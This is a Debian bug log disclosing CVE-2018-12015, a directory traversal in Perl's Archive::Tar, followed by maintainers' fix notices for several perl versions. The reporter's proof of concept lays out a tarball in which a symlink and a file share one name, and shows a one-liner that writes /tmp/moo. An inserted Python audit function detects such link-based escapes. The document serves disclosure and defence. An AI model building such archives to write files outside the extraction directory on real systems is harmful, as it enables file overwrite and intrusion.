perl: CVE-2018-12015: Archive::Tar: directory traversal

Related Vulnerabilities: CVE-2018-12015  

Debian Bug report logs - #900834

Package: src:perl; Maintainer for src:perl is Niko Tyni <ntyni@debian.org>;

Reported by: Jakub Wilk <jwilk@jwilk.net>

Date: Tue, 5 Jun 2018 17:06:01 UTC

Severity: grave

Tags: confirmed, security, upstream

Found in versions perl/5.26.2-5, perl/5.24.1-1, perl/5.28.0~rc2-1, perl/5.20.2-1

Fixed in versions perl/5.26.2-6, perl/5.20.2-3+deb8u11, perl/5.24.1-3+deb9u4, perl/5.28.0-1

Done: Niko Tyni <ntyni@debian.org>

Bug is archived. No further changes may be made.

Forwarded to https://rt.cpan.org/Public/Bug/Display.html?id=125523



Report forwarded to debian-bugs-dist@lists.debian.org, jwilk@jwilk.net, Niko Tyni <ntyni@debian.org>:
Bug#900834; Package src:perl. (Tue, 05 Jun 2018 17:06:04 GMT)


Message #3 received at submit@bugs.debian.org:

From: Jakub Wilk <jwilk@jwilk.net>
To: submit@bugs.debian.org
Subject: perl: Archive::Tar: directory traversal
Date: Tue, 5 Jun 2018 19:03:33 +0200
Source: perl
Version: 5.26.2-5
Tags: security

By default, the Archive::Tar module doesn't allow extracting files 
outside the current working directory. However, you can bypass this 
secure extraction mode easily by putting a symlink and a regular file 
with the same name into the tarball.

I've attached a proof-of-concept tarball, which makes Archive::Tar create
/tmp/moo, regardless of what the current working directory is:

  $ tar -tvvf traversal.tar.gz
  lrwxrwxrwx root/root         0 2018-06-05 18:55 moo -> /tmp/moo
  -rw-r--r-- root/root         4 2018-06-05 18:55 moo

  $ pwd
  /home/jwilk

  $ ls /tmp/moo
  ls: cannot access '/tmp/moo': No such file or directory

  $ perl -MArchive::Tar -e 'Archive::Tar->extract_archive("traversal.tar.gz")'

  $ ls /tmp/moo
  /tmp/moo

-- 
Jakub Wilk
[traversal.tar.gz (application/gzip, attachment)]
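
A pre-extraction check for the archive layout described in the report above, as an added example written with Python's `tarfile`; it is not Archive::Tar code and not the upstream fix. It goes slightly beyond the reported case by also flagging entries nested under a link and links whose targets leave the extraction directory; `audit_tar`, `build_sample` and the sample entries are constructed for illustration.

```python
import io
import posixpath
import tarfile


def audit_tar(fileobj):
    """Return (member_name, reason) findings for link-based escapes."""
    findings = []
    links = {}  # normalized path of every link entry seen so far -> target
    with tarfile.open(fileobj=fileobj, mode="r:*") as tar:
        for member in tar:
            name = posixpath.normpath(member.name)
            parts = name.split("/")
            # An entry at, or beneath, a path that an earlier entry turned
            # into a link would be written through that link on extraction.
            for i in range(1, len(parts) + 1):
                prefix = "/".join(parts[:i])
                if prefix in links:
                    findings.append(
                        (member.name, f"path passes through link {prefix!r}"))
                    break
            if member.issym() or member.islnk():
                target = member.linkname
                # Symlink targets resolve relative to the link's directory,
                # hard-link targets relative to the archive root.
                base = posixpath.dirname(name) if member.issym() else ""
                resolved = posixpath.normpath(posixpath.join(base, target))
                if (posixpath.isabs(target) or resolved == ".."
                        or resolved.startswith("../")):
                    findings.append(
                        (member.name, f"link target {target!r} leaves the tree"))
                links[name] = target
    return findings


def build_sample(entries):
    """Build an in-memory tar from (kind, name, value) tuples (test fixture)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for kind, name, value in entries:
            info = tarfile.TarInfo(name)
            if kind == "symlink":
                info.type = tarfile.SYMTYPE
                info.linkname = value
                tar.addfile(info)
            else:
                info.size = len(value)
                tar.addfile(info, io.BytesIO(value))
    buf.seek(0)
    return buf


# Constructed samples. REPORTED mirrors the listing in the report; the file
# body is made up (the page only shows its size, 4 bytes).
REPORTED = [("symlink", "moo", "/tmp/moo"), ("file", "moo", b"moo\n")]
NESTED = [("symlink", "d", "../outside"), ("file", "d/x", b"")]
BENIGN = [("file", "docs/readme.txt", b"hi\n"),
          ("symlink", "docs/latest", "readme.txt")]

if __name__ == "__main__":
    for label, sample in (("reported", REPORTED), ("nested", NESTED),
                          ("benign", BENIGN)):
        print(label, audit_tar(build_sample(sample)))
```

The check inspects only the archive itself; links that already exist in the destination directory are outside its view.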

Added tag(s) confirmed and upstream. Request was from Dominic Hargreaves <dom@earth.li> to control@bugs.debian.org. (Tue, 05 Jun 2018 22:06:08 GMT)


Marked as found in versions perl/5.24.1-1. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Wed, 06 Jun 2018 04:57:02 GMT)


Marked as found in versions perl/5.20.2-1. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Wed, 06 Jun 2018 05:00:03 GMT)


Changed Bug title to 'perl: CVE-2018-12015: Archive::Tar: directory traversal' from 'perl: Archive::Tar: directory traversal'. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Thu, 07 Jun 2018 13:15:05 GMT)


Set Bug forwarded-to-address to 'https://rt.cpan.org/Public/Bug/Display.html?id=125523'. Request was from Dominic Hargreaves <dom@earth.li> to control@bugs.debian.org. (Thu, 07 Jun 2018 21:36:04 GMT)


Severity set to 'grave' from 'normal' Request was from Dominic Hargreaves <dom@earth.li> to control@bugs.debian.org. (Fri, 08 Jun 2018 09:45:13 GMT)


Marked as found in versions perl/5.28.0~rc2-1. Request was from Dominic Hargreaves <dom@earth.li> to control@bugs.debian.org. (Sat, 09 Jun 2018 14:30:02 GMT)


Reply sent to Dominic Hargreaves <dom@earth.li>:
You have taken responsibility. (Sat, 09 Jun 2018 15:12:03 GMT)


Notification sent to Jakub Wilk <jwilk@jwilk.net>:
Bug acknowledged by developer. (Sat, 09 Jun 2018 15:12:03 GMT)


Message #22 received at 900834-close@bugs.debian.org:

From: Dominic Hargreaves <dom@earth.li>
To: 900834-close@bugs.debian.org
Subject: Bug#900834: fixed in perl 5.26.2-6
Date: Sat, 09 Jun 2018 15:08:26 +0000
Source: perl
Source-Version: 5.26.2-6

We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 900834@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Dominic Hargreaves <dom@earth.li> (supplier of updated perl package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


Format: 1.8
Date: Sat, 09 Jun 2018 13:38:44 +0100
Source: perl
Binary: perl-base perl-doc perl-debug libperl5.26 libperl-dev perl-modules-5.26 perl
Architecture: source
Version: 5.26.2-6
Distribution: unstable
Urgency: high
Maintainer: Niko Tyni <ntyni@debian.org>
Changed-By: Dominic Hargreaves <dom@earth.li>
Description:
 libperl-dev - Perl library: development files
 libperl5.26 - shared Perl library
 perl       - Larry Wall's Practical Extraction and Report Language
 perl-base  - minimal Perl system
 perl-debug - debug-enabled Perl interpreter
 perl-doc   - Perl documentation
 perl-modules-5.26 - Core Perl modules
Closes: 900834
Changes:
 perl (5.26.2-6) unstable; urgency=high
 .
   * [SECURITY] CVE-2018-12015: fix directory traversal vulnerability
     in Archive-Tar (Closes: #900834)




Reply sent to Dominic Hargreaves <dom@earth.li>:
You have taken responsibility. (Tue, 12 Jun 2018 19:36:14 GMT)


Notification sent to Jakub Wilk <jwilk@jwilk.net>:
Bug acknowledged by developer. (Tue, 12 Jun 2018 19:36:14 GMT)


Message #27 received at 900834-close@bugs.debian.org:

From: Dominic Hargreaves <dom@earth.li>
To: 900834-close@bugs.debian.org
Subject: Bug#900834: fixed in perl 5.20.2-3+deb8u11
Date: Tue, 12 Jun 2018 19:33:56 +0000
Source: perl
Source-Version: 5.20.2-3+deb8u11

We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 900834@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Dominic Hargreaves <dom@earth.li> (supplier of updated perl package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


Format: 1.8
Date: Sun, 10 Jun 2018 18:40:37 +0100
Source: perl
Binary: perl-base perl-doc perl-debug libperl5.20 libperl-dev perl-modules perl
Architecture: all amd64 source
Version: 5.20.2-3+deb8u11
Distribution: jessie-security
Urgency: high
Maintainer: Niko Tyni <ntyni@debian.org>
Changed-By: Dominic Hargreaves <dom@earth.li>
Closes: 900834
Description:
 libperl5.20 - shared Perl library
 libperl-dev - Perl library: development files
 perl-base  - minimal Perl system
 perl-debug - debug-enabled Perl interpreter
 perl-doc   - Perl documentation
 perl       - Larry Wall's Practical Extraction and Report Language
 perl-modules - Core Perl modules
Changes:
 perl (5.20.2-3+deb8u11) jessie-security; urgency=high
 .
   * [SECURITY] CVE-2018-12015: fix directory traversal vulnerability
     in Archive-Tar (Closes: #900834)




Reply sent to Dominic Hargreaves <dom@earth.li>:
You have taken responsibility. (Tue, 12 Jun 2018 22:06:22 GMT)


Notification sent to Jakub Wilk <jwilk@jwilk.net>:
Bug acknowledged by developer. (Tue, 12 Jun 2018 22:06:22 GMT)


Message #32 received at 900834-close@bugs.debian.org:

From: Dominic Hargreaves <dom@earth.li>
To: 900834-close@bugs.debian.org
Subject: Bug#900834: fixed in perl 5.24.1-3+deb9u4
Date: Tue, 12 Jun 2018 22:04:09 +0000
Source: perl
Source-Version: 5.24.1-3+deb9u4

We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 900834@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Dominic Hargreaves <dom@earth.li> (supplier of updated perl package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


Format: 1.8
Date: Sun, 10 Jun 2018 18:37:28 +0100
Source: perl
Binary: perl-base perl-doc perl-debug libperl5.24 libperl-dev perl-modules-5.24 perl
Architecture: all amd64 source
Version: 5.24.1-3+deb9u4
Distribution: stretch-security
Urgency: high
Maintainer: Niko Tyni <ntyni@debian.org>
Changed-By: Dominic Hargreaves <dom@earth.li>
Closes: 900834
Description:
 libperl5.24 - shared Perl library
 libperl-dev - Perl library: development files
 perl-base  - minimal Perl system
 perl-debug - debug-enabled Perl interpreter
 perl-doc   - Perl documentation
 perl       - Larry Wall's Practical Extraction and Report Language
 perl-modules-5.24 - Core Perl modules
Changes:
 perl (5.24.1-3+deb9u4) stretch-security; urgency=high
 .
   * [SECURITY] CVE-2018-12015: fix directory traversal vulnerability
     in Archive-Tar (Closes: #900834)




Reply sent to Niko Tyni <ntyni@debian.org>:
You have taken responsibility. (Tue, 26 Jun 2018 08:21:03 GMT)


Notification sent to Jakub Wilk <jwilk@jwilk.net>:
Bug acknowledged by developer. (Tue, 26 Jun 2018 08:21:04 GMT)


Message #37 received at 900834-close@bugs.debian.org:

From: Niko Tyni <ntyni@debian.org>
To: 900834-close@bugs.debian.org
Subject: Bug#900834: fixed in perl 5.28.0-1
Date: Tue, 26 Jun 2018 08:18:09 +0000
Source: perl
Source-Version: 5.28.0-1

We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 900834@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Niko Tyni <ntyni@debian.org> (supplier of updated perl package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


Format: 1.8
Date: Mon, 25 Jun 2018 22:20:16 +0300
Source: perl
Binary: perl-base perl-doc perl-debug libperl5.28 libperl-dev perl-modules-5.28 perl
Architecture: source
Version: 5.28.0-1
Distribution: experimental
Urgency: medium
Maintainer: Niko Tyni <ntyni@debian.org>
Changed-By: Niko Tyni <ntyni@debian.org>
Description:
 libperl-dev - Perl library: development files
 libperl5.28 - shared Perl library
 perl       - Larry Wall's Practical Extraction and Report Language
 perl-base  - minimal Perl system
 perl-debug - debug-enabled Perl interpreter
 perl-doc   - Perl documentation
 perl-modules-5.28 - Core Perl modules
Closes: 900834
Changes:
 perl (5.28.0-1) experimental; urgency=medium
 .
   [ Dominic Hargreaves ]
   * Merge 5.26.2-6 from unstable
     - [SECURITY] CVE-2018-12015: fix directory traversal vulnerability
       in Archive-Tar (Closes: #900834)
 .
   [ Niko Tyni ]
   * Add an autopkgtest check that trivially embeds Perl in C.
   * Import new upstream major release.




Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Mon, 06 Aug 2018 07:30:08 GMT)


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 17:20:48 2019; Machine Name: buxtehude